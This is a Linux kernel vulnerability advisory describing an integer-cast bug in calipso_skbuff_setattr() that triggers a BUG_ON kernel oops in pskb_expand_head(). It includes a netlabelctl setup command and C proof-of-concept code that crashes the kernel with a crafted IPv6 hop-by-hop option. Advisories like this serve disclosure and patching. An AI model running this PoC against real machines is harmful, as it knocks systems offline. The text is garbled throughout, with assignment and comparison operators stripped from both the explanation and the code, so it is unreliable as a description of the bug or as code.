In the Linux kernel, following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by BUG_ON(nhead < 0) at net/core/skbuff.c:2232 pskb_expand_head(). This bug is triggered calipso_skbuff_setattr() routine when skb_cow() passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) 0). The root cause due to an implicit integer cast in __skb_cow(). The check (headroom skb_headroom(skb)) meant ensure that delta = - skb_headroom(skb) never negative, otherwise we will trigger BUG_ON pskb_expand_head(). However, if headroom INT_MAX and <= -NET_SKB_PAD, passes, delta becomes negative value for nhead. Fix condition calipso_skbuff_setattr(). Avoid passing "negative" sizes within calipso_skbuff_setattr() by only using grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default calipso add pass doi:7 default address:0::1/128 protocol:calipso,7 Then run PoC: int fd socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr cmsg_size 2; cmsg_len 0x60; struct msghdr msg; sockaddr_in6 dest_addr; cmsghdr * cmsg (struct *) calloc(1, sizeof(struct cmsghdr) cmsg_len); msg.msg_name &dest_addr; msg.msg_namelen sizeof(dest_addr); msg.msg_iov NULL; msg.msg_iovlen 0; msg.msg_control cmsg; msg.msg_controllen cmsg_len; msg.msg_flags 0; sockaddr dest_addr.sin6_family AF_INET6; dest_addr.sin6_port htons(31337); dest_addr.sin6_flowinfo htonl(31337); dest_addr.sin6_addr in6addr_loopback; dest_addr.sin6_scope_id 31337; cmsghdr cmsg->cmsg_len cmsg->cmsg_level IPPROTO_IPV6; cmsg->cmsg_type IPV6_HOPOPTS; char hop_hdr (char *)cmsg cmsghdr); hop_hdr[1] 0x9; //set hop size (0x9 1) 8 80 sendmsg(fd, &msg, 0);